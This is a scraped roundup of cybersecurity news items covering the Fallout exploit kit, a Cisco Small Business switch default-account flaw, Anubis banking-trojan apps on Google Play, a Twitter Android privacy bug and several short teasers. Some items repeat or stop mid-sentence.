image
A new version of the Fallout exploit kit (EK) has emerged, featuring new exploits and fresh payloads, including the GandCrab ransomware. The development shows that EKs have a lot of life yet left in them, researchers say. The Fallout EK generally finds its victims by way of malvertising campaigns, especially those that take advantage of traffic to adult websites, according to an analysis from Jérôme Segura. It’s been relatively quite so far this year, but the researcher found that since Tuesday, the Fallout EK activity has been picking up the pace on activity. It would appear that its operators took that post-holiday sabbatical to retool. The revised Fallout EK sports several notable new features, such as HTTPS support, a new landing page format, the integration of Powershell to run its payloads, and, most notably, the integration of an exploit for the most recent Flash Player vulnerability, CVE-2018-15982. The vulnerability, which Adobe patched on Dec. 5, is a use-after-free flaw enabling arbitrary code execution in Flash. Researchers with Gigamon Applied Threat Research said that prior to the patch, it was being exploited via a Microsoft Office document dubbed “22.docx.” “The vulnerability allows for a maliciously crafted Flash object to execute code on a victim’s computer, which enables an attacker to gain command line access to the system,” researchers with Gigamon said at the time. They added, “Although the death of Flash has been widely reported thanks to industry efforts to deprecate and remove Flash from web browsers, vectors such as Microsoft Office remain able to load and execute Flash content.” Another notable aspect of the new and improved Fallout EK is the fact that it’s now delivering payloads via Powershell rather than using iexplore.exe. “The Base64 encoded Powershell command calls out the payload URL and loads it in its own way,” explained Segura, in a posting on Wednesday. “This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload.” The resurgence of the Fallout EK (and the fact that the RIG EK saw increased activity in the first half of January, according to Malwarebytes) shows that this threat arena is alive and well, despite the fact that their traditional attack vectors are showing signs of being phased out. “EK activity slowed down in late 2016 and remained really stagnated in 2017, especially if we consider the lack of developments in this space,” Segura told Threatpost. “However, 2018 brought up newer exploits in particular for Internet Explorer and the Flash Player. There is no doubt that this gave exploit kits an extension on their lifespan and this is why we see different actors still leveraging this infection vector.” He added that Fallout’s revamping also tells us is that exploit kit developers are still monitoring the scene for new exploits and techniques. Segura said: “Even though the market share for IE and Flash continues to drop, there are many countries still running older systems where the default browser is Internet Explorer. Therefore, threat actors will take advantage.” Also notable is the fact that Fallout is ahead of the game compared to older EKs like RIG — which may spur increased EK activity going forward. “If we compare the two exploit kits simply based on their features, Fallout is definitely superior,” Segura told Threatpost. “For malware distributors, using a more powerful toolkit will result in a greater number of successful infections. This, in turn, has a direct impact on the popularity of an exploit kit in distribution campaigns.” He added, “Fallout EK is a relatively new exploit kit but within its short tenure has constantly made improvements. This matters because it can lead by example and drive innovation with its competitors.”

Source

image
Exposed personal data seemed to be the big trend this week, which was overshadowed by Troy Hunt’s discovery of a database of breached emails totaling 773 million unique addresses in a popular cloud service. Millions of sensitive files on a storage server belonging to the Oklahoma Department of Securities were also left exposed for a week, and an improperly secured database owned by VOIPO exposed millions of customer call logs, SMS message logs and credentials in plain text. Threatpost’s Tom Spring and Lindsey O’Donnell break down the biggest headlines from this week. Interested in learning more about data breach trends? Join the free Threatpost webinar on Wednesday, Jan. 23 at 2 p.m. EST, as editor Tom Spring examines the data breach epidemic with the help of noted breach hunter and cybersecurity expert Chris Vickery. Vickery shares how companies can identify their own insecure data, remediate against a data breach and offers tips on protecting data against future attacks. [ ](http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/8308427/height/360/theme/legacy/thumbnail/yes/preload/no/direction/backward/%20height=360%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe)

Source

image
A critical and unpatched vulnerability in the widely deployed Cisco Small Business Switch software leaves the door open to remote, unauthenticated attackers gaining full administrative control over the device – and therefore the network. Cisco Small Business Switches were developed for small office and home office (SOHO) environments, to manage and control small local area networks with no more than a handful of workstations. They come in cloud-based, managed and unmanaged “flavors,” and are an affordable (under $300) solution for resource-strapped small businesses. The vulnerability (CVE-2018-15439), which has a critical base CVSS severity rating of 9.8, exists because the default configuration on the devices includes a default, privileged user account that is used for the initial login and cannot be removed from the system. An administrator may disable this account by configuring other user accounts with access privilege set to level 15. However, if all user-configured privilege level 15 accounts are removed from the device configuration, it re-enables the default privileged user account without notifying administrators of the system. “Under these circumstances, an attacker can use this account to log in to an affected device and execute commands with full admin rights,” Cisco explained in its advisory on Wednesday. “[It] could allow an unauthenticated, remote attacker to bypass the user-authentication mechanism of an affected device.” Since the switches are used to manage a LAN, a successful exploit means that a remote attacker would gain access to network security functions such as firewalls, as well as the management interface for administering voice, data and wireless connectivity for network devices. There’s no patch to address the vulnerability, though one is expected at some (as yet unannounced) point in the future, Cisco said. There is however a simple workaround: Just add at least one user account with access privilege set to level 15 in the device configuration. Users can “configure an account by using admin as user ID, setting the access privilege to level 15, and defining the password by replacing with a complex password chosen by the user,” according to the advisory. “By adding this user account, the default privileged account will be disabled.” The flaw affects Cisco Small Business 200 Series Smart Switches, 250 Series Smart Switches, 300 Series Managed Switches, 350 Series Managed Switches, Cisco 350X Series Stackable Managed Switches, 500 Series Stackable Managed Switches and 550X Series Stackable Managed Switches. The Cisco 220 Series and 200E Series Smart Switches aren’t affected, and neither are devices running Cisco IOS Software, Cisco IOS XE Software or Cisco NX-OS Software, according to the networking giant. Earlier in January Cisco issued 18 fixes as part of its monthly update, including two serious vulnerabilities for another small-business stalwart – its security appliance tool. Two bugs, one critical and one high-severity, could ultimately lead to a permanent denial of service (DoS) on impacted devices – and can be exploited by an attacker who simply sends an email.

Source

image
Even after so many efforts by Google for preventing its Play Store from malware, shady apps somehow managed to fool its anti-malware protections and get into its service to infect Android users with malware. Two such Android apps have recently been spotted on the Google Play Store by security researchers with the Trend Micro malware research team, infecting thousands of Android users who have already downloaded them with banking malware. The apps in question masquerade as a currency exchange app called Currency Converter and battery saver app called BatterySaverMobi, and are using motion-sensor inputs of infected Android devices to monitor them before installing a dangerous banking Trojan called Anubis. The malicious Android apps, with a large number of fake five-star reviews, use this clever trick instead of traditional evasion techniques in order to avoid detection when researchers run emulators (which are less likely to use sensors) to detect such malicious apps. “As a user moves, their device usually generates some amount of motion sensor data. The malware developer is assuming that the sandbox for scanning malware is an emulator with no motion sensors, and as such will not create that type of data,” the researchers explain in a blog post published Thursday. “If that is the case, the developer can determine if the app is running in a sandbox environment by simply checking for sensor data.” Once downloaded, the malicious app uses the infected device's motion sensor to detect whether or not the user or the device is moving. If both the device and user are still, the malicious code will not run. As soon as it detects the sensor data, the app runs the malicious code and then tries to trick the victims into downloading and installing the malicious Anubis payload APK with a bogus system update, masquerading as a “stable version of Android.” Not Just Motion Detection…There's More If the user approves the fake system update, the in-built malware dropper uses requests and responses over legitimate services including Twitter and Telegram to connect to its required command and control (C&C) server and downloads the Anubis banking Trojan on the infected device. “One of the ways the app developers hide the malicious server is by encoding it in Telegram and Twitter web page requests. The bank malware dropper will request Telegram or Twitter after it trusts the running device,” the researchers explain. “Then, it registers with the C&C server and checks for commands with an HTTP POST request. If the server responds to the app with an APK command and attaches the download URL, then the Anubis payload will be dropped in the background.” Once compromised, the Anubis banking Trojan obtains users' baking account credentials either by using a built-in keylogger or by taking screenshots of the users' screen when they insert credentials into any banking app. Usually, banking Trojans launch a fake overlay screen on the top of bank account login pages to steal banking credentials. According to the Trend Micro researchers, the latest version of Anubis has been distributed to 93 different countries and targets users of at least 377 variations of financial apps to extract bank account details. The banking Trojan also has the ability to gain access to contact lists and location, send spam messages to contacts, call numbers from the device, record audio, and alter external storage. Google has since removed the two malicious apps from its Play Store. Although it is a never-ending concern, the best way to protect yourself from such malware is to always be vigilant when downloading applications even from Google's official Play store. Most importantly, be careful which apps you give administrative rights to, as it is a powerful permission that can provide full control of your device.

Source

Even after so many efforts by Google for preventing its Play Store from malware, shady apps somehow managed to fool its anti-malware protections and get into its service to infect Android users with malware.

Two such Android apps have recently been spotted on the Google Play Store by security researchers with the Trend Micro malware research team, infecting thousands of Android users who have

Source

Twitter just admitted that the social network accidentally revealed some Android users' protected tweets to the public for more than 4 years — a kind of privacy blunder that you'd typically expect from Facebook.

When you sign up for Twitter, all your Tweets are public by default, allowing anyone to view and interact with your Tweets. Fortunately, Twitter also gives you control of your

Source

image
Twitter just admitted that the social network accidentally revealed some Android users' protected tweets to the public for more than 4 years — a kind of privacy blunder that you'd typically expect from Facebook. When you sign up for Twitter, all your Tweets are public by default, allowing anyone to view and interact with your Tweets. Fortunately, Twitter also gives you control of your information, allowing you to choose if you want to keep your Tweets protected. Enabling “Protect your Tweets” setting makes your tweets private, and you'll receive a request whenever new people want to follow you, which you can approve or deny. It's just similar to private Facebook updates that limit your information to your friends only. In a post on its Help Center on Thursday, Twitter disclosed a privacy bug dating back to November 3, 2014, potentially caused the Twitter for Android app to disable the “Protect your Tweets” setting for users without their knowledge, making their private tweets visible to the public. The bug only got triggered for those Android users who made changes to their Twitter account settings, such as changing their email address or phone number associated with their account, using the Android app between November 3, 2014, and January 14, 2019. “We recognize and appreciate the trust you place in us and are committed to earning that trust every day,” Twitter said in its statement. “We're very sorry this happened, and we're conducting a full review to help prevent this from happening again.” Apparently, on January 14, 2019, Twitter rolled out an update for Android application to fix the programming blunder. Although Twitter did not specify exactly how many Android users were affected by this issue, 4 years is a long time duration, and it's likely that most users have changed their account settings at least once in that period. Twitter said the company has reached out to users whom it knows has been affected by the privacy bug. But since Twitter “can't confirm every account that may have been impacted,” if you are using Twitter for Android app and your tweets are supposed to be protected, it is definitely a good idea to head on to the “Privacy and Safety” settings of your app and double-check the settings to make sure the “Protect your Tweets” is enabled. Desktop and iOS users can breathe a sigh of relief, as they were not affected by the bug. The Twitter bug revelation came at the time when the social network is already under European Union investigation for violating the new General Data Protection Regulation (GDPR) rules. The new law gives European citizens the right to request their personal data from companies, but when Twitter turned down a researcher's request for data related to its short URL service, the Irish Data Protection Commission (DPC) opened an investigation. It seems that the DPC is also aware of the latest privacy bug in the Twitter for Android app, and according to Bloomberg, the commission is currently looking into the matter.

Source

Microsoft is offering rewards of up to $20,000 for flaws in its Azure DevOps online services and the latest release of the Azure DevOps server.

Source

image
By Uzair Amir Ransomware is a reality and threat actors are using it quite avidly and frequently nowadays in order to make easy money. According to the new findings of MalwareHunterTeam, there is in-development ransomware that can encrypt your files, steal credit card information and steal PayPal credentials using the phishing page. The ransomware is not extraordinary in its […] This is a post from HackRead.com Read the original post: New ransomware steals PayPal data with phishing link in ransom note

Source